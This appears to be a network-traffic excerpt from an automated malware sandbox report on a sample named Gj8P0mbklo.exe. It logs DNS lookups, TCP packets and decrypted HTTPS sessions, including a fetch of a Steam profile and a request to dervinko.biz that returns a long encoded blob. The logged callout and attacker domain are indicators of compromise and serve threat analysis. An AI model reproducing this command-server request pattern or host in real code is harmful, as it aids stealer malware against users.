                                                                                                                                                                                          May 6, 2024 15:19:59.689137936 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689203978 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689232111 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689333916 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689352989 CEST44349702104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:59.689371109 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:19:59.689400911 CEST49702443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.870650053 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.870695114 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:00.870770931 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.871059895 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:00.871073961 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.102880955 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103003025 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103537083 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103542089 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103842020 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103846073 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.103965044 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.103977919 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.104006052 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.104017019 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579190969 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579260111 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579298019 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579322100 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579410076 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579420090 CEST44349703104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:01.579452991 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:01.579459906 CEST49703443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.642527103 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.642569065 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.642692089 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.643079996 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.643090010 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.871530056 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.871723890 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872514009 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872525930 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.872864962 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.872869968 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.873087883 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.873105049 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:02.873114109 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:02.873121977 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228497028 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228555918 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.228595018 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.228640079 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257004023 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257026911 CEST44349704104.21.13.203192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:20:03.257047892 CEST49704443192.168.2.6104.21.13.203
                                                                                                                                                                                          May 6, 2024 15:20:03.257071972 CEST49704443192.168.2.6104.21.13.203

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          May 6, 2024 15:19:55.033732891 CEST6254653192.168.2.61.1.1.1
                                                                                                                                                                                          May 6, 2024 15:19:55.143752098 CEST53625461.1.1.1192.168.2.6
                                                                                                                                                                                          May 6, 2024 15:19:55.987637043 CEST5398653192.168.2.61.1.1.1
                                                                                                                                                                                          May 6, 2024 15:19:56.107733011 CEST53539861.1.1.1192.168.2.6

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          May 6, 2024 15:19:55.033732891 CEST192.168.2.61.1.1.10xa300Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          May 6, 2024 15:19:55.987637043 CEST192.168.2.61.1.1.10x52cStandard query (0)dervinko.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          May 6, 2024 15:19:55.143752098 CEST1.1.1.1192.168.2.60xa300No error (0)steamcommunity.com23.61.62.148A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 6, 2024 15:19:56.107733011 CEST1.1.1.1192.168.2.60x52cNo error (0)dervinko.biz104.21.13.203A (IP address)IN (0x0001)false
                                                                                                                                                                                          May 6, 2024 15:19:56.107733011 CEST1.1.1.1192.168.2.60x52cNo error (0)dervinko.biz172.67.133.22A (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                          • dervinko.biz

                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.64969923.61.62.1484436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:19:55 UTC118OUTGET /profiles/76561199609719039 HTTP/1.1
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:19:55 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:19:55 GMT
                                                                                                                                                                                          Content-Length: 34789
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: sessionid=7ef34606fccdc72e192e6b4f; Path=/; Secure; SameSite=None
                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C468fb9988c4683f3fae869b70d5335fe; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                          2024-05-06 13:19:55 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                          2024-05-06 13:19:55 UTC16384INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57
                                                                                                                                                                                          Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyW
                                                                                                                                                                                          2024-05-06 13:19:55 UTC3768INData Raw: 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27
                                                                                                                                                                                          Data Ascii: <span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'
                                                                                                                                                                                          2024-05-06 13:19:55 UTC123INData Raw: 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                          Data Ascii: </div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.649700104.21.13.2034436256C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-05-06 13:19:56 UTC126OUTGET /ujs/89737b57-777d-400d-bb7f-77b7e024920e HTTP/1.1
                                                                                                                                                                                          User-Agent: MyApp/1.0
                                                                                                                                                                                          Host: dervinko.biz
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          2024-05-06 13:19:56 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Mon, 06 May 2024 13:19:56 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zedOCIcPFJlmB0XcL1mnzKPVStj2XErljhzCMFPX6yeN6%2FoOh8dcQrk8m7DMf%2Bd14kDF1cqciNks6vB1kHw8oz13TWluF7dQqOizCrqk8cOtnvgyhgWpPazm%2Bfimr0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 87f943caafa7a522-MIA
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 33 37 63 65 0d 0a 51 7a 38 53 45 52 5a 62 46 51 67 54 57 7a 49 56 45 68 45 55 51 6a 30 53 45 79 41 59 46 52 49 54 57 68 73 4e 45 68 46 69 5a 47 6c 52 43 52 59 56 50 52 49 54 49 42 67 56 45 68 4e 45 47 77 30 53 45 56 78 6b 65 56 31 53 56 56 56 72 62 6e 52 76 56 31 4a 65 56 47 68 6c 64 46 70 42 62 31 56 51 62 6d 31 68 53 6c 4a 41 45 30 52 5a 51 56 4d 54 47 44 4d 58 45 68 4d 67 47 42 55 51 52 52 59 44 46 77 4d 66 43 68 67 56 45 68 45 55 47 52 56 43 58 53 49 43 46 52 42 53 58 45 74 59 58 31 59 75 58 55 31 58 45 7a 34 5a 46 78 49 54 66 52 51 2f 45 68 45 55 47 55 77 34 45 79 41 59 46 52 49 52 46 6c 63 56 43 42 4d 69 57 6d 6c 75 55 67 77 62 47 7a 67 54 49 42 67 56 45 68 45 57 53 52 55 49 45 79 4a 6b 61 58 35 65 56 31 68 62 62 6d 39 48 56 31 70 56 58 56 46 6c 61
                                                                                                                                                                                          Data Ascii: 37ceQz8SERZbFQgTWzIVEhEUQj0SEyAYFRITWhsNEhFiZGlRCRYVPRITIBgVEhNEGw0SEVxkeV1SVVVrbnRvV1JeVGhldFpBb1VQbm1hSlJAE0RZQVMTGDMXEhMgGBUQRRYDFwMfChgVEhEUGRVCXSICFRBSXEtYX1YuXU1XEz4ZFxITfRQ/EhEUGUw4EyAYFRIRFlcVCBMiWmluUgwbGzgTIBgVEhEWSRUIEyJkaX5eV1hbbm9HV1pVXVFla
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 51 43 78 51 62 56 57 35 76 59 77 6f 44 45 42 30 2b 47 52 63 53 45 79 41 59 46 30 49 54 44 68 6b 56 62 6d 39 4d 56 31 5a 54 58 57 68 6c 42 41 51 44 51 6b 70 61 52 55 4a 52 53 32 74 75 63 58 4a 58 51 6b 46 55 52 6d 56 72 5a 30 42 6c 53 68 56 32 55 45 42 59 46 52 34 35 49 42 67 56 45 68 45 55 47 30 4d 51 43 53 41 4a 47 54 67 52 46 42 6b 58 45 68 4d 69 53 46 73 51 43 78 51 62 56 55 42 63 64 30 74 51 51 41 49 43 43 52 6c 58 53 32 55 61 50 78 49 52 46 42 6c 4b 48 6a 6b 67 47 42 55 53 53 6a 34 5a 46 78 49 54 49 42 67 58 58 42 4d 4f 47 52 56 51 62 31 78 62 42 41 73 54 47 44 4d 58 45 68 4d 67 47 42 55 51 51 52 59 44 46 78 42 76 58 48 52 61 55 56 42 59 5a 57 74 78 58 47 4e 37 57 6c 46 74 61 48 74 46 58 55 52 7a 58 55 64 75 62 57 46 4b 55 6b 41 54 52 46 6c 42 55 78
                                                                                                                                                                                          Data Ascii: QCxQbVW5vYwoDEB0+GRcSEyAYF0ITDhkVbm9MV1ZTXWhlBAQDQkpaRUJRS2tucXJXQkFURmVrZ0BlShV2UEBYFR45IBgVEhEUG0MQCSAJGTgRFBkXEhMiSFsQCxQbVUBcd0tQQAICCRlXS2UaPxIRFBlKHjkgGBUSSj4ZFxITIBgXXBMOGRVQb1xbBAsTGDMXEhMgGBUQQRYDFxBvXHRaUVBYZWtxXGN7WlFtaHtFXURzXUdubWFKUkATRFlBUx
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 49 6b 68 62 45 41 73 55 47 31 78 64 58 6d 56 4d 56 42 78 55 54 46 77 56 4f 42 4d 67 47 42 56 50 48 54 34 5a 46 78 49 54 65 7a 49 56 45 68 45 55 47 52 63 51 58 53 49 43 46 52 42 54 61 47 56 55 41 51 41 69 46 44 38 53 45 52 51 5a 46 78 49 52 63 42 6f 50 45 68 4e 6f 5a 58 74 64 55 47 46 55 61 57 35 6b 52 6c 68 5a 62 6d 39 56 53 31 42 41 45 58 42 59 51 31 4d 52 4c 44 49 56 45 68 45 55 47 52 63 51 52 79 49 43 46 51 4d 64 50 68 6b 58 45 68 4d 67 47 42 64 43 58 78 59 44 46 78 42 47 63 6c 6c 62 48 46 52 4d 58 42 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 46 4e 6f 5a 56 51 42 42 43 49 55 50 78 49 52 46 42 6b 58 45 68 46 77 47 67 38 53 45 32 68 6c 65 31 31 51 59 56 52 70 62 6c 31 64 58 46 56 54 58 46 78
                                                                                                                                                                                          Data Ascii: IkhbEAsUG1xdXmVMVBxUTFwVOBMgGBVPHT4ZFxITezIVEhEUGRcQXSICFRBTaGVUAQAiFD8SERQZFxIRcBoPEhNoZXtdUGFUaW5kRlhZbm9VS1BAEXBYQ1MRLDIVEhEUGRcQRyICFQMdPhkXEhMgGBdCXxYDFxBGcllbHFRMXBU4EyAYFU8dPhkXEhN7MhUSERQZFxBdIgIVEFNoZVQBBCIUPxIRFBkXEhFwGg8SE2hle11QYVRpbl1dXFVTXFx
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 68 64 77 51 57 39 50 52 6c 64 44 61 47 56 69 51 56 5a 79 47 48 46 54 52 56 55 62 47 7a 67 54 49 42 67 56 45 68 45 57 54 52 55 49 45 7a 45 55 50 78 49 52 46 42 6b 58 45 68 46 77 56 68 63 49 45 52 5a 38 57 31 64 65 5a 56 5a 42 51 58 4e 47 56 6b 42 42 56 6e 49 57 55 45 70 55 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45 52 51 5a 46 30 6b 35 49 42 67 56 45 68 45 55 47 31 6b 51 43 53 41 61 56 32 35 74 56 77 73 41 45 42 38 4b 47 42 55 53 45 52 51 5a 46 55 49 52 4f 68 67 58 62 6d 31 34 56 6c 52 54 58 31 78 6b 65 46 4e 42 57 46 78 6b 52 6b 5a 6b 55 56 70 75 62 58 64 52 52 56 31 65 5a 57 68 5a 52 30 4a 6f 5a 57 4a 42 56 6e 49 59 63 56 4e 46 56 52 73 62 4f 42 4d 67 47 42 55 53 45 52 5a 4e 46 51 67 54 4d 52 51 2f 45 68 45 55 47 52 63 53 45 58 42 57 46 77 67 52 46 6e 70 66
                                                                                                                                                                                          Data Ascii: hdwQW9PRldDaGViQVZyGHFTRVUbGzgTIBgVEhEWTRUIEzEUPxIRFBkXEhFwVhcIERZ8W1deZVZBQXNGVkBBVnIWUEpUFjMXEhMgRRk4ERQZF0k5IBgVEhEUG1kQCSAaV25tVwsAEB8KGBUSERQZFUIROhgXbm14VlRTX1xkeFNBWFxkRkZkUVpubXdRRV1eZWhZR0JoZWJBVnIYcVNFVRsbOBMgGBUSERZNFQgTMRQ/EhEUGRcSEXBWFwgRFnpf
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 42 51 46 48 64 53 58 56 31 63 5a 47 42 42 56 45 59 5a 63 31 4e 48 59 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 4d 46 77 67 52 42 52 55 39 45 68 4d 67 47 42 55 53 45 30 52 58 46 51 67 54 49 6c 64 46 56 30 4e 56 46 31 4a 4b 56 69 49 79 46 52 49 52 46 45 51 62 4f 42 4d 67 47 42 56 4a 4f 78 51 5a 46 78 49 54 49 42 70 62 45 41 73 55 47 31 56 75 62 32 63 4a 46 78 34 37 46 42 6b 58 45 68 4d 67 47 6b 55 51 43 78 51 62 61 32 35 68 62 31 6c 59 57 31 39 54 5a 57 74 2f 58 48 70 52 57 56 35 51 61 47 56 78 57 30 46 6c 58 6c 70 4b 62 57 68 70 52 56 31 56 61 56 52 51 51 52 4d 59 4d 78 63 53 45 79 41 59 46 52 42 46 46 67 4d 58 41 42 38 4b 47 42 55 53 45 52 51 5a 46 55 4a 64 49 67 49 56 45 46 64 64 53 31 4a 55 58 48 67 57 55 45 70 55 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45
                                                                                                                                                                                          Data Ascii: BQFHdSXV1cZGBBVEYZc1NHYRoZOBEUGRcSEyJMFwgRBRU9EhMgGBUSE0RXFQgTIldFV0NVF1JKViIyFRIRFEQbOBMgGBVJOxQZFxITIBpbEAsUG1Vub2cJFx47FBkXEhMgGkUQCxQba25hb1lYW19TZWt/XHpRWV5QaGVxW0FlXlpKbWhpRV1VaVRQQRMYMxcSEyAYFRBFFgMXAB8KGBUSERQZFUJdIgIVEFddS1JUXHgWUEpUFjMXEhMgRRk4E
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 69 56 68 63 49 45 52 5a 4f 42 52 41 35 49 42 67 56 45 6b 77 59 4d 78 63 53 45 79 42 44 50 78 49 52 46 42 6b 58 45 68 46 70 58 42 63 49 45 52 5a 66 58 31 42 63 61 46 46 59 55 31 52 59 57 31 68 61 51 32 70 61 56 31 35 56 56 31 64 51 55 56 31 68 53 46 74 57 58 6c 42 54 52 78 41 66 43 68 67 56 45 68 45 55 47 52 56 63 45 54 6f 59 46 30 55 43 46 6a 4d 58 45 68 4d 67 52 52 6b 34 45 52 51 5a 46 30 6b 35 49 42 67 56 45 68 45 55 47 31 35 57 45 54 6f 59 46 31 46 66 57 56 68 61 55 31 4a 6a 55 45 56 43 58 31 39 54 55 46 78 61 62 46 78 46 56 6c 78 66 57 46 5a 5a 56 6d 70 57 58 56 4e 55 46 68 55 39 45 68 4d 67 47 42 55 53 45 31 6f 62 44 52 49 52 64 77 41 58 4f 42 45 55 47 52 64 50 48 77 6f 59 46 52 49 52 54 7a 4d 58 45 68 4d 67 47 42 55 51 57 46 41 62 44 52 49 52 62 6c
                                                                                                                                                                                          Data Ascii: iVhcIERZOBRA5IBgVEkwYMxcSEyBDPxIRFBkXEhFpXBcIERZfX1BcaFFYU1RYW1haQ2paV15VV1dQUV1hSFtWXlBTRxAfChgVEhEUGRVcEToYF0UCFjMXEhMgRRk4ERQZF0k5IBgVEhEUG15WEToYF1FfWVhaU1JjUEVCX19TUFxabFxFVlxfWFZZVmpWXVNUFhU9EhMgGBUSE1obDRIRdwAXOBEUGRdPHwoYFRIRTzMXEhMgGBUQWFAbDRIRbl
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 5a 57 56 46 70 55 46 4e 51 56 46 74 65 56 6c 64 53 62 31 31 64 58 6c 52 53 56 31 78 64 56 32 4a 64 55 31 56 42 55 31 4a 5a 58 42 45 73 4d 68 55 53 45 52 51 5a 46 78 42 64 49 67 49 56 45 45 59 47 43 68 55 34 45 79 41 59 46 55 38 64 50 68 6b 58 45 68 4e 37 4d 68 55 53 45 52 51 5a 46 78 42 61 5a 42 6f 50 45 68 4e 56 55 46 35 55 55 57 35 61 55 31 31 54 52 46 52 53 56 31 68 70 53 46 31 58 56 46 31 54 58 6c 39 58 63 46 5a 5a 51 6c 5a 45 53 52 55 65 4f 53 41 59 46 52 49 52 46 42 74 5a 45 41 6b 67 47 6b 49 41 42 52 59 7a 46 78 49 54 49 45 55 5a 4f 42 45 55 47 52 64 4a 4f 53 41 59 46 52 49 52 46 42 74 65 56 68 45 36 47 42 64 54 56 46 56 61 58 31 6c 64 62 56 31 54 51 6c 6c 52 53 56 52
                                                                                                                                                                                          Data Ascii: PRITIBhOOBEUGRcSEyJRURALFBtZWVFpUFNQVFteVldSb11dXlRSV1xdV2JdU1VBU1JZXBEsMhUSERQZFxBdIgIVEEYGChU4EyAYFU8dPhkXEhN7MhUSERQZFxBaZBoPEhNVUF5UUW5aU11TRFRSV1hpSF1XVF1TXl9XcFZZQlZESRUeOSAYFRIRFBtZEAkgGkIABRYzFxITIEUZOBEUGRdJOSAYFRIRFBteVhE6GBdTVFVaX1ldbV1TQllRSVR
                                                                                                                                                                                          2024-05-06 13:19:56 UTC1369INData Raw: 68 4e 64 58 52 55 49 45 79 4a 51 57 31 52 51 57 6c 4a 5a 58 56 42 6d 58 56 70 55 55 31 42 64 55 46 46 61 61 6c 5a 59 57 6c 39 53 56 31 78 57 58 57 46 5a 55 52 41 64 50 68 6b 58 45 68 4d 67 47 42 64 63 45 77 34 5a 46 55 55 41 4d 78 6f 2f 45 68 45 55 47 55 6f 65 4f 53 41 59 46 52 4a 4b 50 68 6b 58 45 68 4d 67 47 42 64 62 56 52 59 44 46 78 42 51 61 56 42 59 58 56 42 51 57 46 35 56 57 32 4e 64 58 31 31 42 56 56 52 61 56 46 46 74 58 46 46 52 58 46 42 63 58 46 46 5a 5a 52 6f 5a 4f 42 45 55 47 52 63 53 45 79 4a 57 46 77 67 52 46 6b 34 45 42 68 45 4b 47 42 55 53 45 55 6b 56 50 52 49 54 49 42 68 4f 4f 42 45 55 47 52 63 53 45 79 4a 52 55 52 41 4c 46 42 74 56 56 46 31 68 58 56 6c 66 58 6c 6c 63 58 6c 39 62 62 45 68 59 56 56 74 61 55 31 68 43 57 32 68 49 58 6c 6c 65
                                                                                                                                                                                          Data Ascii: hNdXRUIEyJQW1RQWlJZXVBmXVpUU1BdUFFaalZYWl9SV1xWXWFZURAdPhkXEhMgGBdcEw4ZFUUAMxo/EhEUGUoeOSAYFRJKPhkXEhMgGBdbVRYDFxBQaVBYXVBQWF5VW2NdX11BVVRaVFFtXFFRXFBcXFFZZRoZOBEUGRcSEyJWFwgRFk4EBhEKGBUSEUkVPRITIBhOOBEUGRcSEyJRURALFBtVVF1hXVlfXllcXl9bbEhYVVtaU1hCW2hIXlle
